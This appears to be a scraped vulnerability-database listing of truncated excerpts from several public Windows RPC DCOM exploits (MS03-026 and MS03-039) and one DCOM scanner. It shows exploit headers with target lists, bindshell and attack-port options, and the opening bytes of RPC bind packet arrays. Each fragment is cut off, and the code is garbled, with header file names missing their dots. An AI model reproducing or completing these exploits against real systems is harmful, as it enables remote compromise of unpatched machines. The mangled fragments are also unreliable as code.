//////////////////////////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 18 Targets
// by pHrail and smurfy + some offsets by teos
//
// Targets:
// 0 Win2k Polish nosp ver 5002195
// 1 Win2k Polish +sp3 ver 5 ...
/*
* have you recently bought one of those expensive new windows security products
* on the market? do you think you now have strong protection?
* Look again:
*
* *rpc!exec*
* by ins1der (trixterjack yahoo com)
*
* windows remote return into libc exploit!
*
* remote rpc exploit breaking non exec memory protection schemes
* tested agains ...
/* Windows remote RPC DCOM exploit
* Coded by oc192
*
* Includes 2 universal targets, 1 for win2k, and 1 for winXP This exploit uses
* ExitThread in its shellcode to prevent the RPC service from crashing upon
* successful exploitation It also has several other options including definable
* bindshell and attack ports
*
* Features:
* ...
/*
DCOM RPC Overflow Discovered by LSD - Exploit Based on Xfocus's Code
Written by H D Moore <hdm [at] metasploitcom>
- Usage: /dcom <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- ...
// This is a new unpatched vulnerability - NOT the MS03-026
#include <winsock2h>
#include <stdioh>
#include <windowsh>
#include <processh>
#include <stringh>
#include <winbaseh>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0 ...
//////////////////////////////////////////////////////////////////////////
//
// Windows RPC DCOM Remote Exploit with 48 TARGETS (Fixed)
//
//////////////////////////////////////////////////////////////////////////
//
// English - French - Chinese - Polish - German
// Japanese - Korean - Mexican - Kenyan
//
// Tk ...
/* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
/* Must be used with the associated shell */
/* */
/* This exploit works against unpatched systems (MS03-039) */
/* ...
/*
RPCDCOM2c ver11
copy by FLASHSKY flashsky at xfocusorg 2003914
*/
#include <stdioh>
#include <winsock2h>
#include <windowsh>
#include <processh>
#include <stringh>
#include <winbaseh>
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x0 ...
#include <stdioh>
#include <winsock2h>
#include <windowsh>
#include <processh>
#include <stringh>
#include <winbaseh>
#pragma comment(lib,"ws2_32")
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0 ...
/*
dcom2_scannerc
scan for second dcom vulnerability (MS03-039)
by Doke Scott, doke at udeledu, 10 Sep 2003
based on work by:
* buildtheb0x presents : dcom/rpc scanner
* ---------------------------------------
* by: kid and farp
and on packet sniffs of MS's dcom2 scanner
*/
#define d_dcom_scan_timeout 5 // max seconds for individual ...
Vulmon